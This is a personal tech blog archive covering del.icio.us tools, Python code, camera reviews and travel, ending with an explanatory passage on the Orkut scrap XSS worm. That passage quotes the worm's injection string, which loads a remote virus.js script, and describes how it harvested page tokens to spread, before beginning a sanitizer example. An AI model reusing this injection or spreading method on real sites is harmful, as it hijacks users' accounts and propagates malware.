Quick Links
- Joshua Callaghan's sculptures based on charts & graphs : neat
- OpenClip: Universal Copy and Paste for the iPhone : I didn't know this bit: "Apple's SDK forbids application developers to create plug-ins for direct collaboration between applications"
- Cut and Paste for iPhone on Vimeo : I think she can't read the periods and commas on her teleprompter. Slow down girl!
- Stuff We Can Buy : I am glad too
- The Pasta of Ill Repute : Good thing I don't cook :-)
- Interview on Micro Four Thirds with head of Olympus Imaging's SLR division, Ogawa Haruoa : interesting bits
- Release Notes - Android 0.9 SDK : "We regret to inform developers that Android 1.0 will not support 3.5" floppy disks." I wanted that functionality! :-)
Shared stuff, APIs, feeds, oh my!
There's no doubt about the fact that we are generating lots and lots of content as part of our online activities. We blog, leave comments, bookmark sites, upload photos and videos, provide status updates and what not. There's so much activity that it's hard to keep track of it all. RSS/Atom feeds have helped but it's just too much work to track down, subscribe and manage a dozen or more feeds for every person that you know.
On a personal level, I've tried to provide feeds for as many of the things I create/share as possible. There's this blog, the tidbits blog, the tumblelog, photos on flickr, code commits, travel updates, status updates and more. Recently was my attempt at bringing all of these bits and pieces of info back to a single location on antrix.net. Although slick (bias!), it really isn't what a central clearing house of a person's activities should look like. As it stands, Recently is rather limited: it doesn't provide permalinks nor feeds, nor does it allow interaction in the form of comments, etc.
Enter stage left: FriendFeed.
I've used FriendFeed on and off for some time now, most of it spent trying to figure out what exactly it does. I still haven't so I will not try to explain. What I will do is to tell you that as of now, I've settled on letting FriendFeed track as much of my publicly accessible info as possible. So everything I mentioned above, with the exception of twitter updates, is now available to you - dear readers - on a single FriendFeed page. Love it or ignore it!
If you are on Facebook, a smaller helping of this stuff should also appear in your Facebook news feed. Of course, only if you are my 'friend'.
There's exactly one thing that I did towards this shuffling of data that's worth noting here. Regular readers will know that I've long been using del.icio.us as a link blog. I use it so much that I even wrote Dumble (and now oohEmbed) as a friendly tumblelog style front end to del.icio.us. So del.icio.us has to remain as the definitive link archive in these quarters.
With that in mind, you can understand why I've been so slow on the uptake of Google Reader's shared items feature, although I've been using Reader exclusively since perhaps late 2006. Simply put, I didn't want to fragment my shared links under two different sources - one of which wouldn't play ball with Dumble. The horror! The only reasonable thing to do was to write some code that took shared items from Google Reader and posted them to my del.icio.us account. And so I wrote yummy. My last blog post alluded to this wee bit of code and indeed, yummy does incorporate feedback from you, dear readers. Where by readers, I mean Harish!
On the whole, I think I'm happy with the current situation. Of course, I'd be much happier if we were in the year 2012 with all this drama behind us - a distant memory of less civilized times. :-)
Now, I shall go pack my bags since, as Dopplr says, I'm scheduled to be in Mumbai tomorrow!
techtalk | 2 comments | permalink | 09.07.2008 17:02 SGT
Python: constrained containers
As it happens, I was playing with the del.icio.us API today because of reasons which I shall hopefully elaborate upon in the coming few days. While cooking up some code to interact with the API, I saw the need to model a basic del.icio.us post entity. For my needs, this entity wouldn't have to be much more than a dumb dictionary with keys like url, description, etc. So I started out that way but pretty soon I thought, wouldn't it be nice to be able to write post.url instead of post['url']? Further, wouldn't it be nice to constrain the keys in the dictionary to those required and prevent typo errors such as post['descrption'] instead of post['description']?
This seemed like the perfect opportunity to put into practice some of the stuff I'd learned about "new" style classes not too long ago. So I wrote the following class which implements the requirements laid out in the preceding paragraph. Since I'm just getting the hang of this stuff, please critique the code!
class Post(object):
    """Class to model a del.icio.us Post.

    It works like a struct/dict like object which limits keys to a
    restricted subset, i.e. those used in a del.icio.us post."""

    __slots__ = ['description', 'url', 'extended', 'tags']

    def __getitem__(self, key):
        if key in self.__slots__:
            return self.__getattribute__(key)
        else:
            raise KeyError

    def __setitem__(self, key, value):
        if key in self.__slots__:
            self.__setattr__(key, value)
        else:
            raise KeyError('Given key is not allowed in class %s'
                           % self.__class__.__name__)

    def __contains__(self, key):
        # A key is "in" the post only if it is an allowed slot *and* has
        # been assigned: __getitem__ raises KeyError in the first case
        # and AttributeError (unset slot) in the second.
        try:
            self.__getitem__(key)
        except (KeyError, AttributeError):
            return False
        return True

    # urllib.urlencode() just needs this beyond the basic stuff above
    def items(self):
        return [(k, self[k]) for k in self.__slots__ if k in self]
And here's the usage of the class.
>>> p = Post()
>>> p.url
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: url
>>> p.url = 'http://google.com'
>>> p.url
'http://google.com'
>>> p['url']
'http://google.com'
>>> p['desc']
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "yummy.py", line 17, in __getitem__
    raise KeyError
KeyError
>>> p['description'] = 'Google homepage'
>>> p['description']
'Google homepage'
>>> p.items()
[('description', 'Google homepage'), ('url', 'http://google.com')]
>>> p.tags = 'search'
>>> p.items()
[('description', 'Google homepage'), ('url', 'http://google.com'), ('tags', 'search')]
>>> 'extended' in p
False
>>> p.extended = 'homepage of the world'
>>> p.items()
[('description', 'Google homepage'), ('url', 'http://google.com'), ('extended', 'homepage of the world'), ('tags', 'search')]
>>>
So, what am I doing wrong? :-)
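A generalised take on the same idea, added here as an example and not code from the post above (written for Python 3): a base class that derives the allowed keys from __slots__, so any subclass gets the dict/attribute access and the typo protection for free, plus a from_mapping() constructor that rejects unknown keys arriving from untrusted input such as a decoded JSON document before they reach the API. The names ConstrainedRecord, fields(), from_mapping() and post_query_string() are assumptions of this example.

```python
from urllib.parse import urlencode


class ConstrainedRecord:
    """Struct-like object whose keys are fixed by __slots__.

    Subclasses declare their allowed fields in __slots__; any other key
    (post['descrption']) or attribute (post.descrption) is rejected with
    an exception instead of silently creating a new entry.
    """
    __slots__ = ()

    @classmethod
    def fields(cls):
        # Collect the slots declared anywhere in the class hierarchy, in
        # declaration order; object itself has no __slots__.
        return tuple(name for klass in cls.__mro__
                     for name in getattr(klass, '__slots__', ()))

    def __getitem__(self, key):
        if key not in self.fields():
            raise KeyError('%r is not a field of %s'
                           % (key, type(self).__name__))
        try:
            return getattr(self, key)
        except AttributeError:
            # Allowed field, but nothing has been assigned to it yet.
            raise KeyError(key) from None

    def __setitem__(self, key, value):
        if key not in self.fields():
            raise KeyError('%r is not a field of %s'
                           % (key, type(self).__name__))
        setattr(self, key, value)

    def __contains__(self, key):
        # Unset slots raise AttributeError on access, so hasattr() tells
        # us whether the field has been assigned.
        return key in self.fields() and hasattr(self, key)

    def items(self):
        # Only the assigned fields, in slot order; this is exactly the
        # shape urlencode() wants.
        return [(k, self[k]) for k in self.fields() if k in self]

    @classmethod
    def from_mapping(cls, mapping):
        """Build a record from a plain dict (e.g. decoded JSON).

        Unknown keys are reported up front, all at once, rather than
        being silently dropped or partially applied.
        """
        unknown = sorted(set(mapping) - set(cls.fields()))
        if unknown:
            raise KeyError('unknown field(s) for %s: %s'
                           % (cls.__name__, ', '.join(unknown)))
        record = cls()
        for key, value in mapping.items():
            record[key] = value
        return record


class Post(ConstrainedRecord):
    """A del.icio.us post, limited to the fields the API understands."""
    __slots__ = ('description', 'url', 'extended', 'tags')


def post_query_string(post):
    """Encode the assigned fields as an application/x-www-form-urlencoded
    query string, ready to be appended to a del.icio.us API call."""
    return urlencode(post.items())


if __name__ == '__main__':
    # Constructed sample input standing in for a decoded JSON document.
    p = Post.from_mapping({'url': 'http://google.com',
                           'description': 'Google homepage'})
    print(post_query_string(p))
```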
techtalk | 6 comments | permalink | 04.07.2008 18:04 SGT
Announcing oohEmbed!
In my last post here, I mentioned some items on my ever growing TODO list and on top of that list was: Finish the web app that I've started working on.
Well, it's time to scratch that one off the list since oohEmbed.com is now live!
A bit of background before I get to what is oohEmbed. As you know, I've been working on and off on Dumble for the past several months. Now Dumble is a purely browser based application with antrix.net serving up just a bunch of static files. Because of this non-involvement of server-side programming and the web browser's same origin policy restrictions, there's a limit to how much smart URL-content-inferring can be achieved in Dumble. With the current design, Dumble can go only as far as the number of websites out there that support JSON APIs.
So on one side, I was toying around with adding a server-side component to Dumble's design to alleviate this problem. On the other, I was looking to kick the tires around Google App Engine. In between the two, the oEmbed specification was announced and thus was born oohEmbed.
So what exactly is oohEmbed? In the simplest terms, oohEmbed acts like a oEmbed API compatible proxy service between you (the developer) and target websites. For more details, visit the oohEmbed.com web site where I've described it a bit more with some examples.
Of course, I've re-written parts of Dumble to use this new oohEmbed service. You can find the forked version at oohembed.com/dumble/. If things go well, I'll designate this as the authoritative version and switch/redirect the version at antrix.net/dumble/ to it.
Thanks to the folks behind oEmbed for drafting the spec and to Google for creating App Engine. Although the App Engine environment is restrictive development wise, there's something to be said for a stack which allows one command - appcfg.py update myapp/ - deployments to the cloud! And it's all Python so I couldn't be any happier!
Please test out oohEmbed and let me know what you think. If you really want to please me, go build something on top of it!
techtalk | 2 comments | permalink | 01.06.2008 22:19 SGT
TODO List
My TODO list just keeps growing. In no particular order, I have to:
- Finish the web app that I've started working on
- Start the web app that I've planned out
- Finish processing photos and clear that backlog
- Get photo backups in order
- Print a few photos as an experiment
- Implement a major feature that I've planned for Mitter
- Finish reading the four books in various stages of completion. Perhaps only three; this one is too irritating to finish.
- Buy an Xbox 360 and play GTA 4, Bioshock
And this is not counting all of the stuff from work! I'm just too lazy these days and need to get my act together.
misc | 2 comments | permalink | 28.05.2008 14:47 SGT
Dumble Update #3
Alright, time for another Dumble update. For those tuning in late, Dumble is a web-app that auto-magically creates a tumblelog out of someone's delicious bookmarks. More background in this introductory post from last November.
So what's been cooking since the last Dumble update which was all the way back in December? For starters, Dumble's source code repository is now online so you can follow Dumble's progress as it happens!
Looking at the changes since December, apart from the bug-fixes and speedup related commits, I've added support for three more sites — Metacafe, Twitter and Wikipedia — while improving support for Amazon. While the Metacafe support just relies on the standard video embed widget, the Twitter and Wikipedia support leverages their respective APIs.
There are a few minor UI changes. You can find a feed subscription link to the currently viewed user's delicious bookmarks.
Finally, there's one change explicitly to support embedding of Dumble on other websites. Let's say you have a website and wish to have your own copy of Dumble running over there tumbling your delicious bookmarks. One way to do this is to just copy all the Dumble code and host it on your site. While I'm perfectly happy if you do that, there is a drawback to that approach. As and when I make any changes to Dumble, you'll have to keep up by modifying your copy of Dumble.
An easier way is to just embed http://antrix.net/dumble/ onto your site. Just copy the following HTML snippet into an index.html file and place it somewhere on your website. Be sure to modify the delicious username and optionally the tag parameters.
<html>
<head>
<title>Dumble : auto tumble your delicious links</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<style type="text/css" media="screen">
html, body {
margin: 0;
padding: 0;
border: 0;
outline: 0;
}
</style>
</head>
<body>
<iframe src="http://antrix.net/dumble/?u=USERNAME&t=TAG&title=My delicious tumblelog" height="100%" width="100%" frameborder="0" scrolling="auto">
Since your browser doesn't support IFrames, please <a href="http://antrix.net/dumble/?u=Ravages">visit Dumble directly</a>.
</iframe>
</body>
</html>
Did you notice the title parameter in the iframe src URI? That's something I added just to enhance this kind of embedding of Dumble. The value of that title parameter will become the window/browser title.
You can see an example of such an embedded Dumble over on Selective Amnesia. In industry parlance, this would be called a reference installation. ;-)
As usual, please test Dumble on your browser/OS combo and let me know of any stuff that breaks. The Wikipedia support is especially hacky and I would appreciate some feedback on that. :)
techtalk | 0 comments | permalink | 28.05.2008 14:36 SGT
Dumble Update
This is a quick update on a few small improvements I've made to Dumble. If you don't know what Dumble is, please read my last post!
Herewith, the minor Changelog:
- There's a new link to quickly add the current user to your del.icio.us network.
- Amazon links now show better sized product images which are fetched using their web services api.
- Fixed a bug in the form where hitting enter key didn't trigger the form's default action. Thanks to Jois for pointing this out!
- Integration with del.icio.us using a View in Dumble bookmarklet and a similar greasemonkey script.
That last bit should really help those of you who liked Dumble but are too lazy to manually type in the url when needed :-)
techtalk | 0 comments | permalink | 28.05.2008 14:36 SGT
Dumble Update #2
I've been working on Dumble on and off since my last update here and there have been quite a few changes since then. Here are the highlights:
- Top Tags: Dumble now fetches the del.icio.us user's top tags so that you can quickly browse around and discover links.
- Session History: As you browse around Dumble, jumping from tag to tag or user to user, your Session History is displayed in a sidebar. This is my way of saying that 'supporting the Back button in an AJAX app is so nasty that I don't even want to attempt it.'
- Cookies: Your last fetched user/tag combo is now saved in a cookie so that the next time you visit Dumble, it'll directly load that combo.
- Internet Explorer 7: Dumble was broken in IE7 for a long time. I finally got around to tracing and fixing the bugs and things should work well in IE7 now. BTW, did you know that something as simple as a trailing comma in an array definition or using <script src="..." /> instead of <script src="..."></script> can confuse IE?
- Miscellany: Various other bugfixes and UI/Usability fixes.. like all links show real links instead of javascript code.
With that, my to-do list for Dumble is more or less complete. Of course, adding formatting support for more kinds of links is an ongoing process. But as far as the core feature set is concerned, I think we are at 1.0 and Dumble is ready for wider use!
As always, if you find any bugs or need any new features, please do comment!
techtalk | 0 comments | permalink | 28.05.2008 14:35 SGT
Dumble
Have you heard of tumblelogs? The Wikipedia definition today reads:
A tumblelog is a variation of a blog, that favors short-form, mixed-media posts over the longer editorial posts frequently associated with blogging. Common post formats found on tumblelogs include links, photos, quotes, dialogues, and video.
Popular and genre defining tumblelogs include Anarchaia and projectionist. My own Tidbits is an attempt at creating a tumblelog. However, I found that much of my tumbling is split between my del.icio.us linker and the Tidbits. Which led me to think if it was possible to create a tumblelog out of my delicious linker.
Dumble is born out of that thinking. Dumble takes any user's delicious links and tries to format the links in a form more suited for a tumblelog. For example, if the link is to a Youtube video, then Dumble automatically embeds the video in the page. Same goes for a link to a Flickr photo - the photo is inserted into the page. Take a look at my dumble, you'll get the idea.
Right now, special posts are created for links to Youtube, Google Video, College Humor videos, Flickr, Amazon and IMDb. The IMDb bit is interesting. I've been saving movie ratings on delicious for some time now and some of you started it too after I wrote about it here. So if Dumble finds a rating in the notes field (in the x/y format), it'll automatically substitute the rating with the appropriate number of stars!
Please give Dumble a spin and let me know what you think. Especially IE users since I've done zero testing on IE! If you find a bug, let me know and I'll boot to Windows (ugh!) and see what's breaking. Safari users, Dumble works okay in Konqueror so I'm guessing it'll be okay in Safari too.
I intend to add special post formatting for more sites periodically but there's a technical limitation to what's possible. Which brings me to:
=== Technical Bits ===
Just like Recently, Dumble is a pure Javascript affair with no server side logic involved. Well, at least none on my server ;-) It fetches JSON from delicious and flickr and wherever else possible. Which is kinda the limitation at the moment. For any more complex post creation, I need to fetch the actual page being linked to but since cross domain GET isn't allowed in the browser's security model, I'm stuck :-( I think I'll give up on my pure-JS ambitions and put in a dummy proxy on antrix.net for XMLHTTPRequests. That will allow for more special posts like a Wikipedia summary generator, etc.
My current todo list for Dumble includes back button support and keyboard navigation (like gmail/g-reader/bloglines). If you have any feature requests or comments on implementation, please let me know!
Related Posts: Dumble Update, Dumble Update #2, Dumble Update #3, oohEmbed powered Dumble
techtalk | 0 comments | permalink | 28.05.2008 14:34 SGT
Stickies #18 : FOC

Inspired by the always wonderful Indexed by Jessica Hagy.
media | 1 comment | permalink | 16.05.2008 19:17 SGT
Python + Prism == Your own Rich Internet Architecture?
So what happened is, we needed to build this application at work and it fell upon me to do it. For various reasons, I decided to write the app in a web client/server style where I wrote the app in python/web.py and a regular browser was used to access it. In other words, your fairly standard web app.
Eventually, it was decided that this model wasn't very convenient from an end-user point of view. The need to setup a separate web server (or integrate with an existing server) just to serve the app was a bit too much of a hassle. Plus, all of Firefox's chrome made this app not feel like an app! So what's a guy to do?
I decided to use webpy's baked in server to host the app and Mozilla's Prism as a client for the app. With the following bit of logic, both the client and server can be invoked from the same piece of code.
#!/usr/bin/env python
# File: ria.py
# Author: Deepak Sarda
#
# Python 2 / web.py 0.2 style code: the handler prints its response body
# and web.run() starts the built-in HTTP server on port 8080.

import subprocess
import thread

import web


def launch_browser(*args):
    """Run the Prism client in a background thread; when it exits, stop the
    server by interrupting the main thread."""
    try:
        # Assuming you already have a Prism webapp profile mapped to
        # http://localhost:8080/
        retcode = subprocess.call(['prism', '-webapp',
                                   'helloworld@antrix.net.prism.app'])
    except OSError:
        # The prism binary could not be executed at all.
        print 'Failed to create client interface'
    print 'Client exited. We can exit too!'
    thread.interrupt_main()


class App:
    def GET(self):
        print """<html><head><title>Hello World!</title></head>
<body><h2>Hello World!</h2><p>If you can read this, then you have just
created your very own RIA!</p></body></html>"""


if __name__ == '__main__':
    thread.start_new_thread(launch_browser, ())
    web.run(('/', 'App'), globals())
Create a shortcut to ria.py and you have your own RIA solution! For bonus points, process all of the python code, web.py, database modules and what not with bb-freeze and you have a zero-install - just unzip and run - RIA!
techtalk | 0 comments | permalink | 10.04.2008 14:43 SGT
Stickies #17 : My Hobby

A new Stickies after a long time! Fans of xkcd will immediately pick the reference in this one. BTW, the numbers come from a true incident at the San Jose airport.
media | 0 comments | permalink | 31.03.2008 23:31 SGT
Observations on the Ricoh Caplio GX100
As you may or may not know (why not?!), I've had a Ricoh Caplio GX100 for a couple of months now. Long enough for me to be comfortable calling it just GX100. We are buddies now.

Anyway, I think it's about time I blogged about the camera. It's a good excuse to do it too considering the silence lately around these quarters.
So what's good about this camera? It's small, it's fast. It's there and ready when I need it. So when I come across good photo opportunities, I don't miss them for want of a camera. Like this one which was taken one morning on the way to my office.
As the old saying goes, the best camera is the one you have in your hand. And this best camera is not just small and fast and in my hand, it takes damn good photos too! Plus, I just love the 24mm wide lens. A few more months working with this and I think I'll have to get the 19mm adapter. One thing though: after getting used to the Panasonic FZ30's enormous zoom (35-420mm), I do have to adapt my shooting style to work within the limited 24-72mm range.
The ergonomics of the GX100 are fantastic. It's great to hold, all the dials are in the perfect place and the software is intuitive and clutter-free. In fact, the controls are the best I've seen in any camera so far. No amount of explaining here will do it justice. You have to pick one up and play with it for some time.
The GX100 takes beautiful macros. I could describe here how sharp the in-focus elements are or how nice the bokeh is but I suggest you just see some of the macros I've uploaded so far. Sure the focus hunts when in macro mode but do you really care about that? It's not like your subject is going to get up and leave!
Overall, I'm very pleased. So now it's time to talk about some downers.
The biggest short-coming is that the GX100 suffers from a rather limited dynamic range. You really have to keep a close eye on the histogram to make sure you don't blow out the sky or something else. I still haven't been able to take a good sweeping vistas kind of shot where everything from the sky to the landscape is properly exposed. Which is a real pity considering the 24mm wide-angle would be really great at taking such shots. Then again, I see several good landscape photos taken with the GX100 on Flickr so perhaps it's just something that I haven't figured out yet.
Another quibble I have is that if you are shooting in low light in Program or Aperture Priority mode and the required exposure duration is longer than a second, the software just refuses to set that. One second exposure it is, no more! It was only after being left with a few rather under-exposed low-light shots did I realize what was happening. Since there's no Shutter Priority mode (or Tv mode for Canon lovers!), you have to go to full manual to work around this gotcha. Of course, since the GX100 has separate dials to control aperture & shutter speed, using the manual mode is no chore.
Yes, you heard that right. Full manual control with two separate dials in a compact camera!
What else? Not much actually. To sum up, it's a great little camera which may or may not be a bit expensive for your budget. It won't replace your SLR but if you are the kind who shoots with a SLR, you ought to look at the GX100 as a companion camera. Interesting anecdote: I was all set to buy a second hand GX100 from a local photographer. Price and date of transaction were fixed. On the night before the camera was scheduled to exchange hands, the guy tells me he's decided against selling it. When I asked why, he explained that he really liked the macro capability of the GX100. Since he liked taking macros, he could either buy a reasonably good macro lens for his SLR at $300+ or just keep the GX100 as a macro camera while having his SLR for other shots. With the GX100 around, he wouldn't have to swap lenses on his SLR whenever he felt like going macro. True story!
However, if you aren't really into photography and are looking at the GX100 just for its compact size and wide angle capability, I suggest you stay away. Its quirks will be enough to make you think that you just threw away good money at this no-good piece of Japanese trash! You really have to know what you are doing when using this camera. Case in point: the GX100 flash isn't going to pop-up by itself in low-light - you have to decide whether you want flash or not.
On the other hand, the same quirks would make the GX100 a good learning tool for someone who wants to get serious about his/her photo taking but isn't too keen on carrying a kilogram of photo gear around.
As for me, I think I'll have to start looking at those Pentax SLRs sometime soon!
techtalk | 4 comments | permalink | 28.03.2008 19:20 SGT
Dumb Questions
For some reason, I had to use my SingPass and while logging in, I was asked to pick and answer some security questions. If you've signed up for an online service, chances are that you've been through the same experience. Here's the list of five questions of which I was asked to pick two:
- What is your pet's name?
- Which is your favourite actor?
- What is the title of your favourite book?
- What is your mother's maiden name?
- What is your father's date of birth?
So let's see:
- I don't have a pet
- Favourite today? Film? TV? Indian? Angrezi?
- Favourite today? Fiction? Non-Fiction?
- Okay.. that I know
- Okay.. that I .. wait.. you want the year also?
Why do they pick questions that will most certainly have answers that change with time? Some months in the future, after I've read some awesome new book and have decided that that has to be the best book ever, you expect me to make a careful note as to which is the second best book ever just so I don't get locked out of this account. WTF?!
For the record, I chose to answer 4 and 5 and I'm sure I put in the wrong year. I wonder how many incorrect answers they'll allow before sending the cops to get me.
rants | 5 comments | permalink | 04.02.2008 12:12 SGT
Trip Summary
kilometres travelled: 9235
cities visited: 4
nephews/nieces met again: 3
old friends met again: 16
weddings attended: 1
photos clicked: 378
kites lost: 3
times MasterCard used: 0
misc | 2 comments | permalink | 02.02.2008 17:39 SGT
Ricoh GX100
Bought the Ricoh GX100 tonight.

I fly out to India tomorrow for a two week break. More on the trip and the camera after I return!
misc | 4 comments | permalink | 13.01.2008 01:46 SGT
How did we get here?
Last night, my housemate came back with a new hard disk to replace his laptop's dead one and asked me to get it up and running. Although I hadn't done a Windows install in ages, I figured it would be straight-forward and wouldn't take much time.
- His HP came with an honest to god proper Windows CD and not some restore partition bullshit. Good on HP! Let's boot from this CD.
- Start setup.. it copies files.. reboot.
- Graphical Setup begins.. bunch of copying.. bunch of questions.. copying.. questions.. copying.. questions.. aargh! Why can't you ask me all the questions in one go!! Reboot.
- Login and realize wireless doesn't work. Hmm.. no option to use WPA TKIP auth? Quick googling on another machine reveals that WPA is only available with Service Pack 2. What's this machine? SP1. Okay...
- Dig out a spare ethernet cable and take the laptop to the router and mate the two.
- Now let's start Windows Update. Update needs to update? Okay. update Update. Reboot.
- Start Windows Update again. What, no SP2 option? But you have 60 other critical updates instead? But wait, what's this shiny graphic next to the critical updates list urging me to update to SP2 to get security updates?! I want to but how do I get SP2?! I'm suffering some cognitive dissonance here. Okay, whatever.. I'll install these updates first. Accept license.. Accept lic.. Accept.. Go!
- As the clock turns midnight and an Amazing Race episode ends, we are asked to reboot. Of course.
- Start Windows Update yet again. Finally an option to install SP2! Start.. Accept.. Go! SP2 setup downloads some 70 odd MB, starts and gives some error that you need to be on AC power before running setup. Aren't we already on AC power? Weird; we are plugged in and yet, there's a battery icon in the systray instead of a power plug icon. Hmm.. remove and re-insert power cord. No change. Reboot (long shot) and try again.. still no go. AC power is still not detected :-( Okay, remove the battery (really long shot!) and boot just on AC power. Works!
- Start Windows Update for the nth time. Thankfully, SP2 setup resumes without re-downloading from scratch. Bunch of next, next, next and off to bed hoping it'll do its thing without needing anymore nexts.
- Come morning and SP2 setup is waiting for someone to reboot.
- After reboot, go to wireless properties and WTF?! Still no WPA option?!
- Hmm.. open Device Manager, find the wireless card, update driver. Thankfully, no reboot needed!
- Open wireless properties with trepidation and hallelujah! Finally, we have a place to enter the WPA key and get online!
While I certainly haven't used all of the operating systems out there, I can safely assert that none of them can be managed by regular people.
This was supposed to be posted yesterday, but I forgot to upload!
rants | 2 comments | permalink | 11.01.2008 14:44 SGT
Stickies #16 : Dead man talking

Too many zombie references have passed my eyes this last week. Drew this while I was (still am!) killing time waiting for a midnight conf-call. Hopefully, it's worth at least a chuckle!
media | 7 comments | permalink | 07.01.2008 22:38 SGT
Jan 1, 2008
misc | 0 comments | permalink | 01.01.2008 19:26 SGT
This and That: 9th Edition
It's been long since something substantial appeared here. By here, I mean, specifically here in the Journal - there's no lack of activity elsewhere. And by substantial, I mean something bloggy, not some email outage or worm coverage. I'll try and make up for it by making this the longest blog post ever. So set some time aside and prepare for some serious rambling. Get a snack if you must.
I've been travelling for the past few weeks for work. Now travelling by itself isn't so bad if you can avoid the travel part of it. The travel itself isn't so bad if you can avoid the airports, especially all of the non-Changi ones. The airports themselves aren't so bad if you can avoid the insane security theatre that greets you at every one of them. It helps to have flown enough miles to get priority check-in & boarding privileges but there's no way around the barefoot dance through the scanner while some uniformed drone peers at layers of your packed stuff in grey/green/red. Or is there?
I was in San Francisco for the first couple of weeks of this trip. It was cold. I was mostly working out of the hotel so that wasn't such a big deal. But I didn't relish having to think about stepping out at just seven in the evening! I guess it's kinda like having to think about stepping out at two in the afternoon here in Singapore.
As you may know, it gets dark pretty early in the northern latitudes of our planet. (I haven't gone South of Equator yet.) I knew that factoid too and have experienced it first hand more than a couple of times. Still, having to re-adjust my clock to a new Sun-cycle is hard. And I'm not talking about jet-lag. You see, I am used to working till dusk, then tuning out, having dinner and perhaps doing a bit of work later in the night after dinner. But with dusk falling at 5 in the evening, it's hard to keep my head from tuning out so early in the day. I felt like shutting down at 5 in the evening, watching TV at 6 and then having dinner at 6:30. My body-clock's working hours are intimately tied to the Sun's - whether I work at night or day. It's hard to separate my schedule from the Sun's.
I shudder to think of how I would cope in Finland.
I managed to visit the Golden Gate bridge this time. It's truly a magnificent structure. Luckily, the day that I went there was a clear one and I got great views all around. Well, all around except for due-west where the late afternoon sun was hanging out.
I got a little active on Facebook while in California. It's much better designed than Orkut, for sure. And it's got Apps. Oh apps.. at once the best and the worst of Facebook. Do I really need to know who bit whom? I'd rather use an app like Dopplr to know who's going where - now that's useful! And I imagine usefulness is the raison d'etre of a social network. Seriously, everyone I know should join Dopplr. It's really useful when you need it and stays out of your way when you don't. Just perfect.
For all the talk of platforms and openness on Facebook, I haven't found any app that is really open. There's the Flixster movies app. I already rate my movies elsewhere - can I import those ratings into Flixster? Can I take my ratings out of Flixster to re-use elsewhere? No and no. Then there are the 'places I've been to' apps. Same story. Can't take data out and can't bring data in from elsewhere.
And then there are the annoying and downright devious apps from the Rockyou.com folks. I added their Likeness app and they used that access privilege to start sending me messages for their Superwall app. Cross-selling BS! No more Rockyou apps for me, thank you very much.
I guess I'll have to write my own apps the way I want them. But then, why would I bother writing one for this closed platform?
I got a chance to visit the Stanford campus where a friend from IIT days showed me around. It's a nice campus with some interesting architecture. Though I found Princeton to be more charming in that sense. But anything is better than MIT architecture, I suppose ;-)
I also went down to the campus bookstore while at Stanford to pick up a Moleskine. It's certainly a very well made notebook with a great feel to it. But I don't think it justifies the cost. I guess the price premium is because many regard it, for lack of a better analogy, as the iPod of notebooks. For me, my horrible handwriting just destroys the beauty of the book :-) It's been really long since I hand-wrote a full page of text in one go. Have any of you written much since you stopped attending classes?
I tried writing in Hindi some time back. It was a disaster. I don't think I can write the entire varnamala from memory. Depressing. On the other hand, I'm happy I could recall the word varnamala without looking it up!
Speaking of writing, I'm writing this in white letters on a dark background. Yes, I've switched my KDE colour scheme to a dark one. It's a nice experience, like all your apps are Adobe Lightroom :-) But it also breaks many apps since lots of apps assume a default light background or a light colour scheme. It's especially bad if you set the web browser to use a default dark canvas - it breaks a lot of websites (including mine!) which forget to explicitly set a background colour. You can imagine the results of that!
Kate, with the dark syntax highlighting scheme, looks great in this colour theme. I tried replicating this with Eclipse but it's just not possible. Broken-ness all over the place.

What else?
The last leg of the trip was in Tokyo where the temperature dropped below 10°C. The hotel we stayed at this time had rooms of a size that reminded me of my cozy hostel room in IIT Madras. And the bathroom was as big as an Indian Railways coach toilet - except this one also had to make space for a shower. Interestingly, the shower area was a bath-tub but I can't imagine anyone over four feet tall using that tub. The bath had some redeeming qualities, though. The shower featured independent knobs for water volume & water temperature. It bugs me no end when the shower apparatus doesn't let me zero in on the right temperature and then lock it! I don't want every use of the shower to become a chance to exercise the Bisection method!
The other redeeming quality was the presence of a heated mirror. I don't really like the soft-blur effect when I'm shaving, thank you very much. If you take these two things for granted, clearly, your quality of life is much better than mine.
The Japanese have this interesting culture of going out almost every night of the week, unlike us who limit the partying to the weekend. You'll find the watering holes crowded until midnight all through the week. I wonder how the young cope with their hang-overs when they have to report to work the next day, on time, no matter what time they hit the sack the night before. :-)
I got a free evening in Tokyo and while walking around Ginza, decided to visit Bic Camera on a lark. I was actually going to get just a retractable ethernet cable before walking out of the store but ended up spending almost an hour over there just geeking over everything. Got a chance to play with the Ricoh GR Digital II. It's a beautiful camera, both in looks and operation. The look is very distinctive with a matt finish and great form. The operation is just fabulous with almost every function you'd want just a dial/knob/click away! If only it weren't so darn expensive! 74,800 Yen! Its zoom lens cousin, the GX 100, wasn't much cheaper at 68,800 Yen :-(
That's a long enough post! I'll leave you with these yummy digital delights from a Bic store display.
ramblings | 0 comments | permalink | 21.12.2007 00:49 SGT
Orkut XSS
Aftermath: Let's try and summarize everything here.
On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo's worm exploited this 'feature'. It started by scrapping a malicious Flash file: just viewing that scrap causes the Flash object to load, which in turn loads our favourite virus.js file. The JavaScript code in that file first joins you to the community called Infectados pelo Vírus do Orkut (in English: Infected by the Orkut Virus) and then sends the same Flash scrap to as many people in your friends list as possible. So when each of your friends views their Scrapbook, they in turn start propagating the worm to their friends, and so on.
Two details are worth pulling out of the packed script further down. First, the <embed> tag the worm posts carries, inside its wmode attribute, the sequence ');r=document.createElement('script');r.src='http://files.myopera.com/virusdoorkut/files/virus.js';...escape(' - a break-out of a JavaScript string literal, which suggests the script tag was injected by Orkut's own scrap-rendering code concatenating that attribute value into script, not by the Flash file itself. Second, the worm reads Orkut's POST_TOKEN and signature values straight out of the page, so the anti-CSRF tokens on CommunityJoin.aspx and Scrapbook.aspx were no obstacle once script was running inside the victim's session: XSS defeats CSRF tokens by design. Friends don't let friends use raw HTML would be a good maxim for everyone to follow ;-)
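As an added example (not Orkut's code and not from the original post), here is what "no raw HTML in scraps" looks like as an allow-list sanitizer in JavaScript, run over a scrap modelled on the worm's. The allowed tag list, the href rule and the example hosts in the checks are this example's own choices; the scrap text and the <embed> tag are the ones the packed script further down builds, and the javascript: link and the event handlers are added to show that they are stripped too.

```javascript
// Added example, not Orkut's code: an allow-list sanitizer for user-supplied
// markup such as a scrap. Unknown tags (embed, object, script, iframe, ...)
// are dropped, and on allowed tags only the listed attributes survive, so
// every on* handler and every Flash/wmode attribute disappears. The tag
// names and the href rule are this example's choices, not Orkut's.

// Allowed tag -> allowed attributes. Everything else is removed.
const ALLOWED = new Map([
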